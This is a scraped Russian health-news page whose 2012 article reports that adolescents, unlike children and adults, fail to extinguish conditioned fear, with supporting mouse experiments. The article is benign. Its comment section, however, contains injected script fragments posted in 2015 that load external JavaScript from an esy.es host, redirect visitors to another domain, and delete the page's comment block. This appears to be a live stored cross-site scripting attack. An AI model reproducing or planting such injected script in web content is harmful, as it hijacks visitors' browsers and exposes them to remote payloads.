Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Подростки не могут поборо...  >>  Подростки не могут побороть страх
 
Обратная связь
 

Подростки не могут побороть страх

Размер шрифта
07 ноября 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Американские ученые выявили особенности формирования страха у подростков.

подростки не могут побороть страх

Что такое страх

Страх – это физиологическая реакция организма, которая сформировалась в процессе эволюции. Страх возникает в момент опасности и обеспечивает защиту. Однако если страх сохраняется в течение длительного времени после того, как опасность исчезает, то из физиологической реакции он превращается в патологическую. Длительный страх лежит в основе многих тревожных расстройств, в т.ч. посттравматического стрессового расстройства.

Исследование при участии людей

В последнее время тревожные расстройства все чаще встречаются у детей и подростков. В качестве основного метода лечения тревожных расстройств психологи используют дозированное воздействие стимула, вызывающего страх, что позволяет избавиться от него. Однако эффективность этого метода у детей и подростков не изучена.

В исследовании приняли участие дети, подростки и взрослые. На экране компьютера последовательно появлялись синие и желтые квадраты, причем в половине случаев появление синих квадратов сопровождалось неприятным шумом. Если участники исследования испытывали страх при появлении шума, они начинали потеть.

На следующий день участники вновь наблюдали за синими и желтыми квадратами на экране компьютера, однако, на этот раз появление желтых квадратов не сопровождалось шумом. Тем не менее, страх перед шумом у подростков не исчез. Несмотря на отсутствие шума, при появлении синих квадратов подростки начинали потеть, в то время как дети и взрослые не испытывали таких ощущений.

Исследование на животных

В исследовании на мышах получены сходные результаты. В отличие от детенышей и взрослых особей у мышей подросткового возраста страх не исчезал после прекращения стимулов, вызывающих его, и сохранялся в течение длительного времени. Оказалось, что в определенном участке головного мозга мышей подросткового возраста отсутствует активность, которая помогает детенышам и взрослым особям избавиться от страха в отсутствии стимула. 

Результаты

Результаты, полученные в обоих исследованиях, свидетельствуют о необходимости более подробного изучения процесса формирования страха у подростков. Авторы исследования надеются, что в дальнейшем им удастся разработать новые методы лечения тревожных расстройств у данной категории пациентов.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 21:24

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 23:33

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Когда вы нервничаете, ваш ребенок толстеет   Что такое паническая атака   Как защитить ребенка от педофилов   Шопоголизм  
06 ноября 2012Подростки не могут побороть страх 31 октября 2012Ученые научились стирать память!
 
01 мая 2013Что удобнее: рюкзак или портфель? Неважно! Тяжелый рюкзак разрушает нервы и мышцы! 01 февраля 2013Диагноз «шизофрения» можно поставить по движению глаз
 

Слайдшоу

1
12 знаменитостей, которые панически боялись испачкаться
Вся правда о депрессии
Супереда против стресса

Тесты

Что вы знаете о грудном вскармливании?
Что вы знаете об СДВГ?
Есть ли у вас анемия?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.